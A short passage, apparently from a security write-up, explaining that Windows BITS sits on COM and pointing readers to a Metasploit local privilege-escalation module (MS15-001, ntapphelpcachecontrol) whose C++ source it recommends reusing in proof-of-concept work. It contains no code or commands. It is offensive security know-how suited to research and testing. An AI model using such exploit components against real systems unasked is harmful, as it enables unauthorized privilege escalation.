    BITS is served on top of Microsoft's Component Object Model (COM). COM is a topic of extensive study, but it is essentially a language-neutral object-oriented binary-interface which is an arguable precursor to .NET. Remnants of COM objects are found in various areas throughout the system, including inter-process (and inter-network) communications with network and local services. BITS Manipulation is fairly straightforward to implement for a software engineer familiar with the aforementioned methodology, BITS documentation, and experience using COM.

    There is an already-written implementation that is available in Metasploit under exploit/windows/local/ntapphelpcachecontrol (MS15-001). The C++ source code offers a simple drop-in implementation for future proof-of-concepts, uncredited but likely written by James Forshaw of Google's Project Zero.

    ❌
    ❌